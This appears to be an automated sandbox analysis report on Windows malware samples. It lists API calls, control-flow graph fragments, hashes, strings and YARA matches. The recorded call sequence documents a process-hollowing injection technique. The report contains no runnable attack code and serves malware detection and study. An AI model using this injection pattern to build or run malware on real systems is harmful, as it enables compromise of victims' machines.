                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: __fassign
                                                                                                              • String ID: .$:$:
                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C2206
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-4236105082
                                                                                                              APIs
                                                                                                              • ___swprintf_l.LIBCMT ref: 009CEA22
                                                                                                                • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A146B
                                                                                                                • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A1490
                                                                                                              • ___swprintf_l.LIBCMT ref: 009A156D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C22F4
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 009C230B
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009C22FC
                                                                                                              • RTL: Re-Waiting, xrefs: 009C2328
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-871070163
                                                                                                              Strings
                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009C248D
                                                                                                              • RTL: Re-Waiting, xrefs: 009C24FA
                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009C24BD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                              • API String ID: 0-3177188983
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: __fassign
                                                                                                              • String ID:
                                                                                                              • API String ID: 3965848254-0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: $$0
                                                                                                              • API String ID: 1302938615-389342756
                                                                                                              • Opcode ID: 687b2076dfd4c6d69d8b784d010a4eb8a2b0894f138c7bcbb6a2030e78babaec
                                                                                                              • Instruction ID: c65049436c6ccddcc461761e7d33385b8ffa2ca63cebd8f7bc9348a57c336168
                                                                                                              • Opcode Fuzzy Hash: 687b2076dfd4c6d69d8b784d010a4eb8a2b0894f138c7bcbb6a2030e78babaec
                                                                                                              • Instruction Fuzzy Hash: 5E919030D04A9ADFDF25CFB9D4453EDBBB1AF81310F18465AD4A1A72D1C7748A82CB54

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:21%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:76
                                                                                                              Total number of Limit Nodes:2
                                                                                                              [Execution graph figure; API call nodes: CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, VirtualProtect]

                                                                                                              Control-flow Graph

                                                                                                              [Control-flow graph figure 249: function at 5c6918, block 5c6b04-5c6bfb calls CreateProcessA]
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005C6BDF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: c917ba9abfd494262e3692675c2aa0b60be6e81f1381257e232cd9e942aee1b4
                                                                                                              • Instruction ID: 38fa1db950ab15877f6e9d4be134aacfff089087d14e25a79a45f8b8046b10c7
                                                                                                              • Opcode Fuzzy Hash: c917ba9abfd494262e3692675c2aa0b60be6e81f1381257e232cd9e942aee1b4
                                                                                                              • Instruction Fuzzy Hash: 7FC105B1D002298FDF24CFA4C845BEEBBB1BF49304F1091A9D959B7240DB749A85CF95

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 368 5c6580-5c65eb 370 5c65ed-5c65ff 368->370 371 5c6602-5c6669 WriteProcessMemory 368->371 370->371 373 5c666b-5c6671 371->373 374 5c6672-5c66c4 371->374 373->374
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 11120c8595b34670e25ff4af7e23e4b38b3a8f19b418e19fdc3137d10cb0cf27
                                                                                                              • Instruction ID: 0f4942fb4dd514928235c1e390c3eacea6790ee5c043e695b66387ab51f52b35
                                                                                                              • Opcode Fuzzy Hash: 11120c8595b34670e25ff4af7e23e4b38b3a8f19b418e19fdc3137d10cb0cf27
                                                                                                              • Instruction Fuzzy Hash: 0141ABB4D012589FCF00CFA9D984AEEFBF1BB49314F20942AE814BB210D775AA45CF64

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 379 5c6578-5c65eb 382 5c65ed-5c65ff 379->382 383 5c6602-5c6669 WriteProcessMemory 379->383 382->383 385 5c666b-5c6671 383->385 386 5c6672-5c66c4 383->386 385->386
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: fb460de148555128520f9f98453fd75afd7052f4a9a341db5bfd2931814563a2
                                                                                                              • Instruction ID: ab8ca970edc7c1a8eb6ade44f78b674bb408d8a4477e970fb2b613fdd8d6eb8c
                                                                                                              • Opcode Fuzzy Hash: fb460de148555128520f9f98453fd75afd7052f4a9a341db5bfd2931814563a2
                                                                                                              • Instruction Fuzzy Hash: 8441ABB4D01218DFDF00CFA9D984ADEBBB1BB49314F24942AE818B7250D735AA45CF64

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 391 5c66d9-5c67a8 ReadProcessMemory 394 5c67aa-5c67b0 391->394 395 5c67b1-5c6803 391->395 394->395
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 3754b287b256775ae201bf4e458ef2f68810b73f22330a9c7da64ac3e3752ee9
                                                                                                              • Instruction ID: 875bfecaf415a4a8e8586b51206de0f213a65cbba2115bf30f100faa98b37e08
                                                                                                              • Opcode Fuzzy Hash: 3754b287b256775ae201bf4e458ef2f68810b73f22330a9c7da64ac3e3752ee9
                                                                                                              • Instruction Fuzzy Hash: A341AAB9D002589FCF00CFA9D984AEEFBB1BF49314F24942AE814BB210D735A945CF64

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 400 5c66e0-5c67a8 ReadProcessMemory 403 5c67aa-5c67b0 400->403 404 5c67b1-5c6803 400->404 403->404
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 96465f5c19521a6cbce7b684763cb5ec7b16635b3cdc57826de90ecc0f821aa0
                                                                                                              • Instruction ID: 09d6b65072bef0e2a508ee4b47cce8bd5bac7812bd090e944dcbf58f06f653a1
                                                                                                              • Opcode Fuzzy Hash: 96465f5c19521a6cbce7b684763cb5ec7b16635b3cdc57826de90ecc0f821aa0
                                                                                                              • Instruction Fuzzy Hash: 4841A8B8D002589FCF00CFA9D984AEEFBB1FB49310F20942AE814B7200D775AA45CF65

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 409 5c6450-5c6518 VirtualAllocEx 412 5c651a-5c6520 409->412 413 5c6521-5c656b 409->413 412->413
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005C6502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 8976d2f09fe3deeb83bd89eda55765d67f681b6c25fadd16404cbf81b991e1ec
                                                                                                              • Instruction ID: 8087116deebd3a98ea68f1825da11498f6a9a14ed0f9de7e96aa6335c75fe3fa
                                                                                                              • Opcode Fuzzy Hash: 8976d2f09fe3deeb83bd89eda55765d67f681b6c25fadd16404cbf81b991e1ec
                                                                                                              • Instruction Fuzzy Hash: 7B41AAB8D002589FCF10CFA9D984AEEBBB1BF49310F24942AE814BB210D735A906CF55

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 418 5c6458-5c6518 VirtualAllocEx 421 5c651a-5c6520 418->421 422 5c6521-5c656b 418->422 421->422
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005C6502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: f874d8da349f4f1cb817f0a81c2e22ddd61f61c20327a43e838a97bd3445e710
                                                                                                              • Instruction ID: fbdcb928b0d6fb1a02589d227fefef15ee3cab64565843ffabcca0cb0a3a09ec
                                                                                                              • Opcode Fuzzy Hash: f874d8da349f4f1cb817f0a81c2e22ddd61f61c20327a43e838a97bd3445e710
                                                                                                              • Instruction Fuzzy Hash: 154177B8D00258DFCF10CFA9D984ADEBBB5FB49310F20942AE814BB210D775A945CF65

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 427 1dadfa-1daebd VirtualProtect 430 1daebf-1daec5 427->430 431 1daec6-1daf02 427->431 430->431
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001DAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.409784532.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_1d0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 800d1e41d3ddab46b661436e98ac4a17617d136145a2f277c21b15783a0f5caf
                                                                                                              • Instruction ID: ac293011c9420da04b08566951d51ceeb4a03a1077ee8f52b60a99b41557455b
                                                                                                              • Opcode Fuzzy Hash: 800d1e41d3ddab46b661436e98ac4a17617d136145a2f277c21b15783a0f5caf
                                                                                                              • Instruction Fuzzy Hash: FB3176B9D002589FCF14CFA9D984ADEFBB5AB49310F24902AE814B7210D375AA45CF65

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 434 5c6321-5c6388 436 5c639f-5c63ed Wow64SetThreadContext 434->436 437 5c638a-5c639c 434->437 439 5c63ef-5c63f5 436->439 440 5c63f6-5c6442 436->440 437->436 439->440
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 005C63D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 8da36d0c565f750d95297ad9cd0e7dccea27f01e0df76f9aa94db9cd1144475d
                                                                                                              • Instruction ID: 4e7483e22f13529e5b53ff09866e30ecade6da9f5e8eb977f9c0cbf65fde5e7e
                                                                                                              • Opcode Fuzzy Hash: 8da36d0c565f750d95297ad9cd0e7dccea27f01e0df76f9aa94db9cd1144475d
                                                                                                              • Instruction Fuzzy Hash: 1E41BCB4D012589FDB14CFA9D984AEEFFB1BF49314F24842AE418BB240D739AA45CF54

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 445 1dae00-1daebd VirtualProtect 447 1daebf-1daec5 445->447 448 1daec6-1daf02 445->448 447->448
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001DAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.409784532.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_1d0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 005C63D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(?), ref: 005C62B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.408796779.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_bd000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ?$"j$$$)$)$2$6$7C$<k$@$B$IX$L$Mw$OT$OT$Sa$j$kU$m$z.$:$p
                                                                                                              • API String ID: 0-1047631854
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$O$S$\$s
                                                                                                              • API String ID: 0-3854637164
                                                                                                              • Opcode ID: 56ab9df5c11938337c652ea74ed91fddbdbceb7b8d3eb7ea9f8349fa386e0f1b
                                                                                                              • Instruction ID: db0b2ae2138d921a2caf03ac8d855a4a481700443c6e4ce8c71e7e57a9be74d3
                                                                                                              • Opcode Fuzzy Hash: 56ab9df5c11938337c652ea74ed91fddbdbceb7b8d3eb7ea9f8349fa386e0f1b
                                                                                                              • Instruction Fuzzy Hash: 755181B2D00118ABDB10EF94DC89FEEB3B8EF54719F0081A9E90C67140E7B57A548BE1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f606145ee6f7a392aff193389f19703048a6601b137c67aa90b71660fbd2628
                                                                                                              • Instruction ID: 306f6c3093de6437bd84bb1b8b0b8bc0178e9d3fb8bf893a96770d21892ae10f
                                                                                                              • Opcode Fuzzy Hash: 1f606145ee6f7a392aff193389f19703048a6601b137c67aa90b71660fbd2628
                                                                                                              • Instruction Fuzzy Hash: 44411DB1D11219AFDB14CF99D881AEEBBBCEF49714F10415AFA14E7240E7B1A641CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3e987fffb49473e6bc214f8bf284547be807434b4b753ddbd6d5e07491ee6258
                                                                                                              • Instruction ID: 46a3bb392ee0975b7109ee0116cf7e1153d2e68ae52194e19e93363d564b1a10
                                                                                                              • Opcode Fuzzy Hash: 3e987fffb49473e6bc214f8bf284547be807434b4b753ddbd6d5e07491ee6258
                                                                                                              • Instruction Fuzzy Hash: 8A31E1B5A00208AFDB14DF99D881EEEB7B9AF8C314F108219F918A7340D730A851CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9f76fb5044966d8b9c747d9d1325e87b1f183ae6c114cc6b93dd117d557072e
                                                                                                              • Instruction ID: d868f9b78b5dbc62284867b576ecf7ee9d3dc2b399357c41a4171d0c16486701
                                                                                                              • Opcode Fuzzy Hash: e9f76fb5044966d8b9c747d9d1325e87b1f183ae6c114cc6b93dd117d557072e
                                                                                                              • Instruction Fuzzy Hash: 9231F8B5A00609AFDB14EF99DC41EEFB7F9EF88304F108619F918A7240D770A811CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8adc32fcfee9950e4ba5222b01eef5f20ac9763c26a9b64b453e90786937ee9
                                                                                                              • Instruction ID: 7947d9cdfe6c2bfb85392782e20376c70953565291f35083b323ab124b0da835
                                                                                                              • Opcode Fuzzy Hash: e8adc32fcfee9950e4ba5222b01eef5f20ac9763c26a9b64b453e90786937ee9
                                                                                                              • Instruction Fuzzy Hash: DE21EBB5A00219AFEB14DF98DC41EEFB7B9EF88714F10451DF918A7240D7706921CBA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a30d71f374c94724dad470f83b5ea0bf109194f2d4a5f694dc6be19dc287062d
                                                                                                              • Instruction ID: 88718f88ea6479f0ab80cb010600b1ae80ada82599c04bab2d00a53fac51d86e
                                                                                                              • Opcode Fuzzy Hash: a30d71f374c94724dad470f83b5ea0bf109194f2d4a5f694dc6be19dc287062d
                                                                                                              • Instruction Fuzzy Hash: 1C1186B2380215BBF7209E55DC42FEF375D9B84B59F244019FF08BE2C1D6A5B81186B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4a134050f2a525881f3ae1b2260dd856a2d6ec1e3ee6a59fd2441e77cc3c80d
                                                                                                              • Instruction ID: acb89ddb31c8c0b8a063a0f99e446c3fb46e8f61585c17d0cb58965fe9735404
                                                                                                              • Opcode Fuzzy Hash: a4a134050f2a525881f3ae1b2260dd856a2d6ec1e3ee6a59fd2441e77cc3c80d
                                                                                                              • Instruction Fuzzy Hash: 8311FEB6D1121CAF9B40DFA9D8419EFB7F9EF48214F10416EE919E7200E7706A148BE1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                              • String ID: 5$L$M$P$c$l$|
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • String ID: $e$k$o
                                                                                                              • String ID: $e$h$o
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • String ID: 0$2$5$f
                                                                                                              • String ID: %l`"$%l`"2$2$@l`$%&,!4%l`"2
                                                                                                              • API String ID: 0-2462281787
                                                                                                              • Opcode ID: 824cf1183d70a0fd72d210dcabc696742dd1701eacf40ccfa1035069a35b1547
                                                                                                              • Instruction ID: b04f9dcb28b6897cd489071aed98b0a00a17aca0dfc24b6ae358b84e2c5408ea
                                                                                                              • Opcode Fuzzy Hash: 824cf1183d70a0fd72d210dcabc696742dd1701eacf40ccfa1035069a35b1547
                                                                                                              • Instruction Fuzzy Hash: EBF0ECB580020C9ACB04DF94DD45AEE7F74FF04204F505998D9157B181E771A714C7F6

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.5%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0.5%
                                                                                                              Total number of Nodes:408
                                                                                                              Total number of Limit Nodes:56

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E90E3C
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
